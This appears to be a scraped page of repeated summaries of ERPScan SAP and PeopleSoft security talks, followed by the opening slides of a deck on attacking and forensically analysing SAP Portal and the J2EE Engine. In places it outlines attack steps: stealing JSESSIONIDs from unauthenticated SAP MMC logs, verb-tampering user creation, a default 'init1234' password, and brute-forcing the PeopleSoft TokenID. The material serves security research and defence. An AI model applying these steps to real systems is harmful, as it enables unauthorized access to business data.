SAP is the most popular business application, with more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed and all critical information, such as finances, HR and client data, is stored. Not caring about the security of this data is not very sensible.
The presentation provides examples of simple and advanced attacks along with ways to avoid them.
The document discusses security issues related to SAP solutions and introduces ERPScan as an innovative product to help address these issues. It notes that over 2500 security notes have been released for SAP, highlighting growing threats. ERPScan provides integrated assessment of application platform security, ABAP code security, and business logic security. It can monitor SAP servers for vulnerabilities, misconfigurations, critical authorizations, and compliance with standards. The system aims to help automate security checks and reduce costs associated with SAP security problems.
SAP is the most popular business application, with more than two hundred forty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. However, in ERP systems, all business processes are performed and all critical information, such as finances, HR and client data, is stored. Not caring about the security of this data is not very sensible.
SAP NetWeaver Development Infrastructure is a complex system. It combines the characteristics and advantages of local development environments with a server-based development landscape. It centrally provides the means to support the software, implement new features, manage a product's lifecycle, and so on. Its main aim is to control the deployment of components in the system landscape in a standardized manner.
The key component of the DI scheme is the Software Deployment Manager (SDM). It is directly connected to the production systems, which is why it is so critical.
The presentation describes special features of SDM and provides several SDM attack scenarios along with the ways to prevent them.
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP - ERPScan
This document discusses vulnerabilities in connecting ERP and ICS systems. It notes that while ERP, ICS, and other business systems need to be connected to share information, these connections can be exploited by attackers to infiltrate corporate networks. The document outlines several ways that vulnerabilities in ERP systems, misconfigurations, unnecessary privileges, and system interconnectivity can be leveraged to access sensitive business data or disrupt operations. It emphasizes that securing these connections and monitoring for security issues is critical for business security and continuity.
If I want a perfect cyberweapon, I'll target ERP - ERPScan
ERP systems are widely used in Oil and Gas, Manufacturing, Logistics, Financials, Nuclear, Retail, Telecommunication and other industries. All mission-critical data is stored in ERP systems, so attacks against them may result in espionage, sabotage and fraud.
The presentation gives examples of real and potential attacks and describes important details of ERP Security.
Alexander Polyakov, CTO of ERPScan, presented this talk at RSA Conference Europe 2013.
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back... - ERPScan
This document discusses server-side request forgery (SSRF) attacks and their history. SSRF attacks allow an attacker to exploit vulnerabilities in web applications to initiate requests from the server to other internal or external systems. The document outlines the basics of SSRF attacks and categorizes different types, providing examples of how SSRF can be used in proxy and connect-back attacks. It emphasizes the risk of SSRF attacks against critical enterprise applications given the sensitive data they contain.
If I want a perfect cyberweapon, I'll target ERP - second edition - ERPScan
This document discusses security risks associated with enterprise resource planning (ERP) systems like SAP. It begins by noting how critical ERP systems are for large companies and the vast number of customers that major ERP vendors have. It then provides examples of security risks like espionage, sabotage and fraud that can occur in ERP modules like materials management. Specific vulnerabilities that could allow manipulating materials prices or blocking materials posting are described. The document emphasizes that while examples focus on SAP, the risks apply to all major ERP systems.
This document discusses security threats related to SAP systems. It notes that SAP is one of the most widely used business applications, with over 250,000 customers worldwide. However, SAP systems also contain a wealth of sensitive information and are targets for espionage, sabotage, and fraud. The document outlines how a single compromised SAP system could provide access to critical corporate data and processes. It emphasizes that many SAP instances have not been updated in years and contain thousands of known vulnerabilities. Additionally, SAP systems are highly interconnected both within and between companies, allowing threats to spread widely. Strong security is needed to protect SAP environments and the organizations that rely on them.
SAP Mobile infrastructure consists of multiple systems, such as SAP Mobile Platform (formerly Sybase Unwired Platform), the SAP Afaria MDM solution, the Sybase SQL Anywhere database, and hundreds of SAP mobile applications. They even have their own store for mobile apps, which can be developed by third parties. This talk highlights how one can hack SAP Mobile.
In this popular platform, we have discovered a lot of typical vulnerabilities - XSS, XXE, hardcoded static encryption keys, and vulnerabilities that are specific to this platform - logic vulnerabilities and privilege escalations. As a result, after compromising the SAP Mobile platform, we demonstrated how to get access to compromised mobile phones.
SAP security landscape. How to protect (hack) your (their) big business - ERPScan
This document discusses security risks related to SAP applications. It describes ERPScan, a company that provides SAP security monitoring. It then discusses two specific risks: 1) Credit card data theft, where attackers could access encrypted credit card data stored in SAP tables. 2) Competitive intelligence risks, where attackers could access bidding information in SAP SRM to unfairly underbid competitors. The document emphasizes that SAP systems are complex, customized, and rarely updated, making them vulnerable to attacks.
The presentation describes 5 steps you should take to secure your SAP. They are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
This document discusses security vulnerabilities in SAP systems. It notes that many SAP systems have non-web services exposed that could allow remote access. It also details how passwords are sometimes stored insecurely in SAP shortcuts, log files, and database tables, allowing attackers to gain access to systems and steal sensitive data. The document recommends steps companies can take to prevent such vulnerabilities, like patching systems, not storing passwords in shortcuts, and using more secure authentication methods.
The presentation provides the list of the top 10 SAP vulnerabilities (2011-2012) along with ways to defend against them.
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
Oracle PeopleSoft applications are under attack (Hack in Paris) - ERPScan
Oracle is the second largest vendor on the ERP market, and its PeopleSoft is used in more than 7000 companies, including about 50% of the Fortune 100. PeopleSoft applications are used worldwide, with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes
Practical SAP pentesting workshop (NullCon Goa) - ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company's ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor, with more than 250,000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at NullCon Goa Conference is a practical SAP pentesting guide.
Practical SAP pentesting (B-Sides São Paulo) - ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company's ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor, with more than 250,000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at B-Sides Conference 2014 (São Paulo) is a practical SAP pentesting guide.
The document discusses security issues related to SAP systems and portals. It notes that while SAP is widely used, security vulnerabilities are common due to lack of logging and exposure of services. The document emphasizes that SAP portals deserve attention as they provide a common entry point for attackers and link to other critical systems. Proper monitoring of portals and exposed services is needed to detect attacks and unauthorized access.
Forgotten world - Corporate Business Application Systems - ERPScan
This document discusses penetration testing of enterprise resource planning (ERP) systems. It notes that ERP systems are complex, mission-critical applications that contain sensitive business and financial data. Penetration testing ERP systems requires in-depth knowledge of business processes, custom implementations, and various operating systems, databases, and hardware platforms used. The goal is to identify risks like data exposure or business disruption, not just gaining shell access. Exploits also need to be carefully adapted to avoid unintended impacts to the system.
Business applications like ERP, CRM, SRM and others are one of the major topics in the field of computer security, as these applications store business data, and any vulnerability in them can cause significant monetary and reputational loss or even a stoppage of business.
Nonetheless, people still do not pay much attention to the technical side of SAP security.
As for SAP, we saw different vulnerabilities at all levels (architecture, software vulnerabilities and implementation).
Oracle PeopleSoft applications are under attack (HITB AMS) - ERPScan
Oracle is the second largest vendor on the ERP market, and its PeopleSoft is used in more than 7000 companies, including about 50% of the Fortune 100. PeopleSoft applications are used worldwide, with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes the PeopleSoft architecture and provides several internal and external attack vectors. Let's look at the most dangerous one. PeopleSoft systems are often accessible from the Internet, and some parts of the system have to be available before registration, for example job application forms or "Forgot your password?" forms. For this purpose, there is a special user with minimal rights in PeopleSoft systems. When you access the system, it automatically authenticates you as this user. This creates an opportunity for a privilege escalation attack by brute-forcing the authentication cookie called TokenID. TokenID is generated using the SHA1 hashing algorithm, and according to the latest information, an 8-character alphanumeric password can be brute-forced within one day on the latest GPUs, which cost about $500.
EAS-SEC: Framework for securing business applications - ERPScan
For quite a long time, ERP security was synonymous with segregation of duties. But nowadays this situation has changed. There are 3 areas of business application security: SOD, custom code security and application platform security. SAP customers are now aware of problems with SAP installations, but they still do not know where they should start to solve them.
The aim of EAS-SEC (http://eas-sec.org/) is to raise awareness of enterprise application security problems and to create guidelines and tools for enterprise application security assessment.
5 real ways to destroy business by breaking SAP applications - ERPScan
This document discusses security risks related to SAP applications. It describes 5 ways that business applications can be broken into, including espionage, sabotage, and fraud. Specific risks discussed include theft of credit card data from SAP's SD module, and compromise of competitive bidding information from the SRM module. The document advocates for security measures like configuration checks, access controls and code scanning to help defend against attacks.
This document discusses securing enterprise business applications. It notes that major companies rely on applications like SAP, Oracle, and Microsoft Dynamics for critical functions. However, these applications are often vulnerable to attacks like espionage, sabotage, and fraud due to issues like outdated versions, poor patching processes, and internet accessibility. The document argues that securing these widely implemented but vulnerable applications is essential for protecting companies and their sensitive data, operations, and financials.
The latest changes to SAP cybersecurity landscape - ERPScan
The document discusses cybersecurity risks related to SAP systems. It describes two main risks: 1) Credit card data theft, where a hacker could access tables storing unencrypted credit card data in the SD module and steal the data. 2) Competitive intelligence theft through the SRM module, where a competitor could access bidding information to undercut prices unfairly. The document advocates for stronger configuration controls, access management, and patching to help mitigate these risks.
Many SAP systems are connected to the Internet and expose sensitive services beyond web applications. Furthermore, the internal network is usually not properly segmented.
The interest in SAP security is growing exponentially, and not only among whitehats. Unfortunately, SAP users still pay little attention to SAP security.
The findings were presented at RSA APAC Conference 2013.
This research focuses on statistics of SAP Vulnerabilities, threats from the Internet, known incidents and future trends.
SAP provides Business Intelligence platforms, which can be a promising target for business espionage. Business executives make their strategic decisions and report on their performance based on the information provided by their Business Intelligence platforms. So how valuable could that information be for the company's largest competitor? Even further, what if the consolidated, decision-making data has been compromised?
What if an attacker has poisoned the system and changed the key indicators? SAP BusinessObjects is used by thousands of companies world-wide and serves as the gold standard platform for Business Intelligence.
In this presentation we will discuss our recent research on SAP BusinessObjects security. Specifically, through several live demos, we will present techniques attackers may use to target and compromise an SAP BusinessObjects deployment and what you need to do in order to mitigate those risks.
The document discusses security issues related to SAP applications. It outlines 13 ways that SAP systems can be exploited to damage businesses. It then provides recommendations on how to assess security risks, prioritize updates, and comply with regulations to better protect SAP systems. The document also notes that ERPScan has discovered over 3,000 vulnerabilities in SAP products since 2007 and discusses the business risks of espionage, sabotage, and fraud if SAP systems are compromised.
Top 10 most interesting vulnerabilities and attacks in SAP - ERPScan
An increasing number of SAP Security Notes and talks on SAP security prove that it has become a really hot topic nowadays. However, attacks on SAP systems are still believed to be possible only for insiders. The reality is not so good: there are about 5000 systems, including dispatchers, message servers, SapHostcontrols and web services, exposed on the Internet.
The top 10 vulnerabilities of 2011-2012 are:
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
The presentation provides a detailed description of these attacks, their potential business risks and the ways to prevent them.
SAP security landscape. How to protect(hack) your(their) big businessERPScan
This document discusses security risks related to SAP applications. It describes ERPScan, a company that provides SAP security monitoring. It then discusses two specific risks: 1) Credit card data theft, where attackers could access encrypted credit card data stored in SAP tables. 2) Competitive intelligence risks, where attackers could access bidding information in SAP SRM to unfairly underbid competitors. The document emphasizes that SAP systems are complex, customized, and rarely updated, making them vulnerable to attacks.
The presentation describes 5 steps you should take to secure your SAP. There are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
This document discusses security vulnerabilities in SAP systems. It notes that many SAP systems have non-web services exposed that could allow remote access. It also details how passwords are sometimes stored insecurely in SAP shortcuts, log files, and database tables, allowing attackers to gain access to systems and steal sensitive data. The document recommends steps companies can take to prevent such vulnerabilities, like patching systems, not storing passwords in shortcuts, and using more secure authentication methods.
The presentation provides the list of top 10 SAP vulnerabilities (2011-2012) as well as ways of defense.
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
Oracle PeopleSoft applications are under attacks (Hack in Paris)ERPScan
Oracle is the second largest vendor on the ERP market, and its PeopleSoft is used in more than 7000 companies including about 50 % of Fortune 100. PeopleSoft applications are widespread over the world with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes
Practical SAP pentesting workshop (NullCon Goa)ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor with more than 250000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at NullCon Goa Conference is a practical SAP pentesting guide.
Practical SAP pentesting (B-Sides San Paulo)ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor with more than 250000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at B-Sides Conference 2014 (San Paulo) is a practical SAP pentesting guide.
The document discusses security issues related to SAP systems and portals. It notes that while SAP is widely used, security vulnerabilities are common due to lack of logging and exposure of services. The document emphasizes that SAP portals deserve attention as they provide a common entry point for attackers and link to other critical systems. Proper monitoring of portals and exposed services is needed to detect attacks and unauthorized access.
The presentation describes 5 steps you should take to secure your SAP. There are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
Forgotten world - Corporate Business Application SystemsERPScan
This document discusses penetration testing of enterprise resource planning (ERP) systems. It notes that ERP systems are complex, mission-critical applications that contain sensitive business and financial data. Penetration testing ERP systems requires in-depth knowledge of business processes, custom implementations, and various operating systems, databases, and hardware platforms used. The goal is to identify risks like data exposure or business disruption, not just gaining shell access. Exploits also need to be carefully adapted to avoid unintended impacts to the system.
Business applications like ERP, CRM, SRM, and others are one of the major topics in the field of computer security as these applications store business data and any vulnerabilities in these applications can cause a significant monetary and reputational loss or even stoppage of business.
Nonetheless, people still do not pay much attention to the technical side of SAP security.
As for SAP, we saw different vulnerabilities at all levels (architecture, software vulnerabilities and implementation).
Oracle PeopleSoft applications are under attack (HITB AMS)ERPScan
Oracle is the second largest vendor on the ERP market, and its PeopleSoft is used in more than 7000 companies including about 50 % of Fortune 100. PeopleSoft applications are widespread over the world with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes PeopleSoft Architecture and provides several internal and external attack vectors. Let’s look at the most dangerous one. PeopleSoft systems are often accessible from the Internet. And some parts of the system have to be available before registration, for example, job application forms or “Forgot your password?” forms. For this purpose, there is a special user with minimal rights in PeopleSoft systems. When you enter, the system automatically authenticates you as this user. It is an opportunity to perform a privilege escalation attack by bruteforcing the authentication cookie called TokenID. TokenID is generated based on SHA1 hashing algorithm, and according to the latest information, 8-characters alpha-numeric password can be decrypted within one day on latest GPUs that cost about $ 500.
EAS-SEC: Framework for securing business applicationsERPScan
For a quite long time, ERP Security was only the synonym of segregation of duties. But nowadays this situation has changed. There are 3 areas of Business Application Security such as SOD, Custom Code security and Application platform security. SAP customers are now aware of problems with SAP installations, but they still don’t know, where should they start to solve them.
The aim of EAS-SEC (http://eas-sec.org/) is to aware people about enterprise application security problems and create guidelines and tools for enterprise application security assessment.
5 real ways to destroy business by breaking SAP applicationsERPScan
This document discusses security risks related to SAP applications. It describes 5 ways that business applications can be broken into, including espionage, sabotage, and fraud. Specific risks discussed include theft of credit card data from SAP's SD module, and compromise of competitive bidding information from the SRM module. The document advocates for security measures like configuration checks, access controls and code scanning to help defend against attacks.
This document discusses securing enterprise business applications. It notes that major companies rely on applications like SAP, Oracle, and Microsoft Dynamics for critical functions. However, these applications are often vulnerable to attacks like espionage, sabotage, and fraud due to issues like outdated versions, poor patching processes, and internet accessibility. The document argues that securing these widely implemented but vulnerable applications is essential for protecting companies and their sensitive data, operations, and financials.
The latest changes to SAP cybersecurity landscapeERPScan
The document discusses cybersecurity risks related to SAP systems. It describes two main risks: 1) Credit card data theft, where a hacker could access tables storing unencrypted credit card data in the SD module and steal the data. 2) Competitive intelligence theft through the SRM module, where a competitor could access bidding information to undercut prices unfairly. The document advocates for stronger configuration controls, access management, and patching to help mitigate these risks.
Many SAP systems are connected to the Internet, and exposing sensitive services beyond Web applications. Furthermore, the internal network is usually not properly segmented.
The interest in SAP security is growing exponentially, and not only among whitehats. Unfortunately, SAP users still pay little attention to SAP security.
The findings were presented at the RSA APAC Conference 2013.
This research focuses on statistics of SAP Vulnerabilities, threats from the Internet, known incidents and future trends.
SAP provides Business Intelligence platforms, which are a promising target for business espionage. Business executives make their strategic decisions and report on their performance based on the information provided by their Business Intelligence platforms. How valuable would that information be to the company's largest competitor? Even further, what if the consolidated, decision-making data has been compromised?
What if an attacker has poisoned the system and changed the key indicators? SAP BusinessObjects is used by thousands of companies world-wide and serves as the gold standard platform for Business Intelligence.
In this presentation we will discuss our recent research on SAP BusinessObjects security. Specifically, through several live demos, we will present techniques attackers may use to target and compromise an SAP BusinessObjects deployment and what you need to do in order to mitigate those risks.
The document discusses security issues related to SAP applications. It outlines 13 ways that SAP systems can be exploited to damage businesses. It then provides recommendations on how to assess security risks, prioritize updates, and comply with regulations to better protect SAP systems. The document also notes that ERPScan has discovered over 3,000 vulnerabilities in SAP products since 2007 and discusses the business risks of espionage, sabotage, and fraud if SAP systems are compromised.
Top 10 most interesting vulnerabilities and attacks in SAP (ERPScan)
The increasing number of SAP Security Notes and talks on SAP security proves that it has become a hot topic. However, attacks on SAP systems are still believed to be possible only for insiders. The reality is worse: there are about 5000 SAP systems, including dispatchers, message servers, SAP Host Control instances and web services, reachable from the Internet.
Top 10 vulnerabilities 2011-2012 are:
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
The presentation provides a detailed description of these attacks, their potential business risks and the ways to prevent them.
Architecture vulnerabilities in SAP platforms (ERPScan)
SAP security has become a hot topic. Attacks on SAP can put a business at risk of espionage, sabotage and fraud.
The presentation covers the following architecture and unusual issues:
Authentication Bypass
1. Verb tampering
2. Invoker servlet
Encryption
3. Storage – SAPGUI
4. Authentication – P4
5. Transfer – RFC, Diag
SSRF
6. Port Scan
7. Command execution
8. Security bypass
The presentation also gives advice for developers and describes future trends in the SAP security area.
A crushing blow at the heart of SAP's J2EE Engine (ERPScan)
Business-process automation (ERP, PLM, CRM, SRM) is based on the ABAP stack, while the following integration, collaboration and management components are based on the J2EE Engine:
- SAP Portal
- SAP PI
- SAP XI
- SAP Mobile Infrastructure
- SAP Solution Manager.
Administrators, developers, pentesters and researchers mostly focus on the ABAP stack. Attackers know this, so they will look for the easier route to controlling your business.
The presentation describes the SAP J2EE platform architecture and provides examples of internal and external attacks and ways to prevent them.
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy... (ERPScan)
The presentation describes the special features of the Software Deployment Manager (SDM), the component of the SAP NetWeaver Development Infrastructure that deploys software directly into production systems, and provides several SDM attack scenarios along with the ways to prevent them.
Practical pentesting of ERPs and business applications (ERPScan)
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in the company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. Industrial espionage, sabotage and fraud or insider embezzlement may be very effective if targeted at the victim’s ERP system and cause significant damage to the business.
The presentation describes what is specific to ERP pentesting and focuses on pentesting SAP NetWeaver Java and Oracle PeopleSoft.
Default accounts are commonly exploited to gain unauthorized access to SAP systems. The presentation identifies several new default accounts in SAP Solution Manager with the password "init1234" that can be used to retrieve passwords, execute operating system commands, and fully compromise associated SAP systems. It provides examples of how these accounts can be exploited and advises customers to use available tools to detect and remediate exposed default accounts.
CISO Platform Annual Summit 2013: New Framework for ERP Security (Priyanka Aash)
The document discusses various guidelines for assessing security in SAP systems. It describes the EAS-SEC standard developed by ERPScan, which includes 33 critical checks across 9 areas. This is proposed as a first step for rapid security assessments. The document also mentions other guidelines from SAP, ISACA, and DSAG that can be used for more comprehensive assessments. It highlights some limitations of existing guidelines and the need to develop standards that cover all applications and aspects of security, including source code reviews. The author proposes expanding the EAS-SEC framework to address these gaps.
The interest in SAP security has been growing exponentially, and not only among whitehats. SAP invests money and resources in security, provides guidelines and arranges conferences, but, unfortunately, SAP users still pay little attention to SAP security.
The presentation gives the most important takeaways for CISOs responsible for SAP security in their enterprises. It debunks SAP security myths, includes statistics obtained by the ERPScan Research Group, and describes future trends in SAP security.
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics (Onapsis Inc.)
The largest organizations in the world rely on SAP platforms to run their critical processes and keep their business crown jewels: financial information, customer data, intellectual property, credit cards, human resources salaries, sensitive materials, suppliers and more. Everything is there, and attackers know it.
Now, the big question arises: Has your SAP system ever been hacked? Is it compromised today? If your answer is “no”, are you sure? Do you know what to look for? Unfortunately, most organizations do not have this knowledge today, which only empowers the bad guys.
For several years at Onapsis we have been researching how cyber-criminals might be able to break into ERP systems, in order to help organizations better protect themselves. This has given us unique expertise on which attack vectors are the most critical and what kind of traces they leave (and don't leave) on the victim SAP platforms.
This presentation will cover how to do a forensic analysis of an SAP system, looking for traces of a security breach. Learn where fingerprints may have been left, understand which are the available system tools that may help you and which are their limitations. Watch several live demos of security breaches and find out how you may be able to detect that they took place, helping you assess the business impact and track down the attacker.
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements (Olivier DASINI)
MySQL Enterprise Transparent Data Encryption (TDE) protects your critical data by enabling data-at-rest encryption in the database. It protects the privacy of your information, prevents data breaches and helps meet regulatory requirements including the Payment Card Industry Data Security Standard (PCI DSS), Health Insurance Portability and Accountability Act (HIPAA) and numerous others.
MySQL Enterprise Audit provides an easy to use, policy-based auditing solution that helps organizations implement stronger security controls and satisfy regulatory compliance.
As more sensitive data is collected, stored and used online, database auditing becomes an essential component of any security strategy. To guard against the misuse of information, popular compliance regulations including HIPAA, Sarbanes-Oxley, and the PCI Data Security Standard require organizations to track access to information.
MySQL Enterprise Firewall guards against cyber security threats by providing real-time protection against database specific attacks. Any application that has user-supplied input, such as login and personal information fields is at risk. Database attacks don't just come from applications. Data breaches can come from many sources including SQL virus attacks or from employee misuse. Successful attacks can quickly steal millions of customer records containing personal information, credit card, financial, healthcare or other valuable data.
MySQL Enterprise Masking and De-identification provides an easy to use, built-in database solution to help organizations protect sensitive data from unauthorized uses by hiding and replacing real values with substitutes.
MySQL Enterprise Edition provides ready to use external authentication modules to easily integrate existing security infrastructures, including Linux Pluggable Authentication Modules (PAM) and Windows Active Directory.
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us (PROIDEA)
Nowadays, everyone knows about the great importance of SAP systems and the critical data processed by them. Large companies install SAP Security Notes regularly so as not to repeat the mistake of Nvidia. One bug is no longer enough to get access to all corporate SAP systems. Pentesters frequently find themselves in a situation where the OS of an SAP server has been compromised successfully, but they have not gained access to the ERP system. It is also rather common to hold an unprivileged account which gives access to an encrypted password, but not to the whole system. Sometimes they try to break into other systems with the passwords users reuse from systems they have already broken into, but they cannot, because those passwords first need to be decrypted. Where do we find the treasured password that unlocks the financial transactions and revenues of NASDAQ giants?
Where and how does SAP store user passwords? Are all passwords stored as hashes, or can attackers find passwords in plaintext?
This talk reviews the many places where SAP stores critical credentials, such as usernames and passwords, and, which is more interesting, the way it stores them. Methods of retrieving them will be described, and decryption utilities will be presented.
SAP GUI shortcuts, RFC connections, SAP Security Storage, logs, traces, Database links, SAP HANA Storage, you name it – all varieties of SAP modules will be discussed in this talk.
Accelerate 2022: Solving the SAP Security Gap through Application-aware Network... (PeterSmetny1)
This document discusses securing SAP systems and provides an overview of Fortinet's SAP security solutions. It notes that network security is foundational but SAP security is also important as SAP admins do not secure the network and network admins do not secure SAP. It then outlines Fortinet's SAP security blueprint and describes how the company provides network security, web security, secure access solutions, and a SAP connector to help secure SAP deployments. The document concludes by providing contact information for Fortinet's SAP security team.
Exploiting Critical Attack Vectors to Gain Control of SAP Systems (Onapsis Inc.)
This presentation will highlight three attack vectors targeting SAP.
- SAP Portal Header Authentication
- Verb Tampering
- Abuse of JAVA Core Services
You will learn techniques to mitigate these threats.
The document discusses various security issues related to SAP systems. It begins with an introduction to SAP and overview of SAP security history. It then covers the top 10 latest interesting attacks against SAP systems, including authentication bypass vulnerabilities, buffer overflows, and denial of service attacks. The document provides details on each vulnerability, including technical details, potential business impacts, and recommendations for prevention. It aims to educate audiences on the most critical vulnerabilities impacting SAP systems.
Business applications like ERP, CRM, SRM and others are one of the major topics of information security, because these applications store business-critical data and any vulnerability in them can cause significant monetary and reputational loss or even a stoppage of business.
There are several myths about Business Applications Security such as:
Myth 1: Business Applications are available only internally.
Myth 2: ERP security is a vendors' problem.
Myth 3: Business Application internals are very specific and unknown to hackers.
Myth 4: ERP security is all about Segregation of Duties.
Our findings debunk these myths.
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
1. Invest in security to secure investments
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
2. About ERPScan
• The only 360-degree SAP security solution: ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team: 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
3. Agenda
• Why SAP
• Why SAP forensics
• Why it is hard
• Attack examples and forensics
  – Simple attacks
  – Advanced attacks
• Defense
• Conclusion
4. SAP
• The most popular business application
• More than 180000 customers worldwide
• 74% of the Forbes 500 run SAP
• 300+ clients in South Africa by 2004
• Nearly every South African government body runs SAP
5. Why SAP security?
• Espionage
  – Theft of financial information
  – Theft of corporate secrets and information
  – Theft of supplier and customer lists
  – Theft of HR data
• Sabotage
  – Denial of service
  – Tampering with financial records
  – Access to the technology network (SCADA) through trust relations
• Fraud
  – False transactions
  – Modification of master data
9. Is it relevant for South Africa?
Simple scan for SAP Routers exposed to the Internet:
• 63 SAP Routers found on the default port
• 27 SAP Routers with medium-critical issues
• 7 SAP Routers with high-critical issues
Number of web-based SAP systems found:
• 20 by Shodan
10. What about other services?
[Chart, series "World": SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd. Source: http://erpscan.com/wp-content/uploads/2012/06/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdf]
11. Who actually tried to break SAP?
Now, it adds, “We gained full access to the Greek Ministry of Finance. Those funky IBM servers don't look so safe now, do they...” Anonymous claims to have a “sweet 0day SAP exploit”, and the group intends to “sploit the hell out of it.”
* This attack has not been confirmed by the customer nor by the police authorities in Greece investigating the case. SAP does not have any indication that it happened.
12. What about unpublished threats?
• Companies are not interested in publishing information about their breaches
• There are a lot of internal breaches thanks to unnecessarily granted authorizations (an employee buys hundreds of excavators instead of ten by mistake)
• There are known stories about backdoors left by developers in custom ABAP code
• How can you be sure that, if a breach occurs, you can find evidence?
16. What do we need to monitor? External attacks on SAP
• Ideally, we should control everything, but this talk has limits, so let's focus on the most critical areas:
  – Attacks on users and SAP GUI: awareness
  – SAP Router: secure configuration and patch management
  – Exposed SAP services: disable them
  – SAP Portal: too many issues and too much custom configuration, possibly 0-days; this is the area to concentrate on
17. SAP Portal
• Point of web access to SAP systems
• Point of web access to other corporate systems
• Way for attackers to get access to SAP from the Internet
19. Let's begin the technical part
Full logging is not always the best option*
* not only because of system high load
20. Full logging is not always the best option
• SAP MMC: centralized system management
• Allows you to see the trace and log messages
• If TRACE_LEVEL = 3, JSESSIONIDs are stored in the logs:
  <SID>/DVEBMGS<id>/j2ee/cluster/server0/log/system/userinterface.log
• It's not bad if you only use it sometimes and delete the logs after use, but…
21. But sometimes…
• SAP MMC has remote commands
• By default, many commands go without authentication
• Commands are simple SOAP requests
• An attacker can read logs without authentication
• …and read the JSESSIONIDs stored in the logs
• …and use them to log into SAP Portal
25. SAP logging
“If you are running an ABAP + Java installation of Web AS with SAP Web Dispatcher as a load balancing solution, you can safely disable logging of HTTP requests and responses on J2EE Engine, and use the corresponding CLF logs of SAP Web Dispatcher. This also improves the HTTP communication performance. The only drawback* of using the Web Dispatcher's CLF logs is that no information is available about the user executing the request (since the user is not authenticated on the Web Dispatcher, but on the J2EE Engine instead).”
http://help.sap.com/saphelp_nw70ehp1/helpdata/en/ef/8cd7f51dfead42ab90537886104269/frameset.htm
* Not the only one… There are many complex attacks with POST requests.
26. SAP J2EE logging
http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
• Categories of system event recording:
  – System: all system-related security and administrative logs
  – Applications: all system events related to business logic
  – Performance: reserved for single activity tracing
• Default location of these files in your file system: /usr/sap/<sid>/<id>/j2ee/cluster/<node>/log
• Developer trace files of the Java instance: <SID>/<instance name>/work
• Developer trace files of the central services: <SID>/<instance name>/work and <SID>/<instance name>/log
• Java server logs: <SID>/<instance name>/j2ee/cluster/server<n>/log
27. Simple attacks
• Information disclosure and XSS
• Verb tampering via HEAD
• Invoker servlet via GET
All of that can be found in HTTP headers:
j2ee\cluster\<node>\log\system\httpaccess\responses.trc
30. Verb Tampering: Attack
• Create a new user ITWEB:ITWEB
